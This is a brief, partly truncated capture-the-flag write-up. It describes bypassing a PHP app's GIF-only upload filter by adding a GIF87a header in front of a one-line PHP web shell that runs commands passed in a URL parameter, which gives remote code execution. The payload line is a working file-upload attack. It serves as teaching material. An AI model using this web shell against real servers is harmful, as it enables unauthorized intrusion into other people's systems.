I made a secure php web app where I can upload all my gifs. Some people on the internet told me to run it in a docker container just to protect it from my personal files, but who cares.
At first, I uplaoded a Gif fie which was uploaded successfully then I attempted to upload a basic PHP payload and got this error
from the error we can see that the files are stored at
As the server only permitted GIF files.I modified the payload by adding a GIF header,
GIF87a; <?php system($_GET['cmd']) ?>
And it worked we got remote code execution. We can now execute commands on the machine
we can find the flag at: